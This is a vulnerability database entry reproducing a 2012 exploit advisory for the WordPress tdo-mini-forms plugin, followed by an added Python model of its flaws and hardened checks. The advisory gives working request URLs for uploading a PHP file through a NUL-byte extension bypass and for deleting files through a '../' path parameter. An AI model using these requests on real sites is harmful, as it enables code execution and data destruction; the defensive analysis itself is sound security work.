wordpress tdo-mini-forms plugin (rfu/rfd) Vulnerabilities

Vulnerability ID 1046081 Vulnerability type
Published 2012-11-21 Updated 2012-11-21
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012110149
|Details
Vulnerability details have not yet been disclosed.
|Exploit
 
------------------------------------------------------------
wordpress tdo-mini-forms plugin (remote file upload/remote file deletion) Vulnerabilities
Author : Cold z3ro , www.hackteach.org , www.s3curi7y.com
Anonymous => You are the man 
 
 
# Remote file upload :
 
wordpress/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
 
file extension : file.php%00;.jpg
uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP%00;.jpg
 
Example of uploaded path :
wordpress/wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg
 
 
 
# Remote file Deletion
 
=> Note : use any HTTP POST header modifier .
 
tdomf_form_id = 1;
deletefile[]  = 1;
filepath      = $variable ( wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg )
index         = NULL
 
Example of result : 
wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&deletefile[]=1&filepath=../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP%00;.jpg&index=
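The two requests above rely on the same two weaknesses: a filename check that only looks at what follows the last dot, so `z3ro.PHP%00;.jpg` passes as a `.jpg` while a NUL-terminated file API stores `z3ro.PHP`, and a `filepath` parameter that the server joins onto its own directory without confining the result. The following Python model, an added illustration that is not the plugin's code and not part of the original advisory, replays the advisory's own filename and `../../../` path against a naive check and against a hardened one; the install root under `/var/www/wordpress`, the allowed-extension set and the function names are assumptions for the example.

```python
# Added illustration (not the plugin's code): how the NUL-byte extension
# bypass and the client-supplied delete path from the advisory slip past
# naive checks, beside the checks that stop them. Paths are assumed.
import ipaddress
import posixpath
import re
from urllib.parse import unquote

# Assumed install layout, mirroring the paths quoted in the advisory.
WP_ROOT = "/var/www/wordpress"
PLUGIN_DIR = posixpath.join(WP_ROOT, "wp-content/plugins/tdo-mini-forms")
UPLOAD_ROOT = posixpath.join(WP_ROOT, "wp-content/uploads/tdomf/tmp")
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# The advisory's filename, URL-decoded: "z3ro.PHP" + NUL + ";.jpg"
POC_NAME = unquote("z3ro.PHP%00;.jpg")
# The advisory's deletion path, relative to the plugin directory
POC_DELETE_PATH = "../../../wp-content/uploads/tdomf/tmp/1/127.0.0.1/" + POC_NAME


def naive_ext_ok(filename: str) -> bool:
    """Model of a suffix-only check: does the name end in an allowed extension?"""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def stored_name(filename: str) -> str:
    """Model of what a NUL-terminated (C string) file API keeps from the name."""
    return filename.split("\x00", 1)[0]


def hardened_ext_ok(filename: str) -> bool:
    """Reject NUL and path separators, then require one sane basename.ext."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})", filename)
    return m is not None and m.group(1).lower() in ALLOWED_EXT


def naive_delete_target(filepath: str) -> str:
    """Model of trusting a client-supplied path relative to the plugin dir."""
    return posixpath.normpath(posixpath.join(PLUGIN_DIR, filepath))


def hardened_delete_target(form_id: str, client_ip: str, filename: str):
    """Derive the directory server-side; accept only a bare, valid filename."""
    if not re.fullmatch(r"[0-9]{1,9}", form_id):
        return None
    try:
        ipaddress.ip_address(client_ip)  # raises ValueError on garbage
    except ValueError:
        return None
    if not hardened_ext_ok(filename):
        return None
    base = posixpath.join(UPLOAD_ROOT, form_id, client_ip)
    target = posixpath.normpath(posixpath.join(base, filename))
    # Belt and braces: the resolved path must stay inside the per-request dir.
    if posixpath.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    print("naive ext check passes PoC name:", naive_ext_ok(POC_NAME))
    print("name actually stored:", stored_name(POC_NAME))
    print("hardened ext check on PoC name:", hardened_ext_ok(POC_NAME))
    print("naive delete resolves to:", naive_delete_target(POC_DELETE_PATH))
    print("hardened delete of PoC name:", hardened_delete_target("1", "127.0.0.1", POC_NAME))
    print("hardened delete of clean name:", hardened_delete_target("1", "127.0.0.1", "photo.jpg"))
```

The hardened deletion never takes a path from the client at all: the form id and requester address select the directory on the server side, and the filename must survive the same whitelist as an upload, so a `..` segment or an embedded NUL is refused before any path is built.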
 
Eof;